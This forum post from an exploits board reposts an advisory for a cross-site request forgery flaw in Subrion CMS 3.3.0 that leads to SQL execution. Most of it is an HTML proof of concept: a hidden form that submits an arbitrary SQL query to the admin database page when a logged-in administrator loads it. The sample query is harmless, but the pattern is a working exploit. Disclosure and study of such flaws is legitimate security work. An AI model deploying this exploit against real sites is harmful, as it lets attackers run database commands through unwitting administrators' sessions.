Jump to content
Aerosol

Subrion 3.3.0 Cross Site Request Forgery

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

# Affected software: subrion
# Type of vulnerability: csrf to sql injection
# URL: http://demo.subrion.org
# Discovered by: Provensec
# Website: http://www.provensec.com
#version v3.3.0
# Proof of concept






no csrf protection on database form which made subrion to vulnerable
to database injection

vuln parameter query


poc:

<html>

  <body>
    <form action="http://demo.subrion.org/admin/database/" method="POST">
      <input type="hidden" name="query"
value="SELECT * FROM  `sbr301_albums`  `id` "
/>
      <input type="hidden" name="table" value="sbr301_albums" />
      <input type="hidden" name="field" value="id" />
      <input type="hidden" name="exec_query" value="Go" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...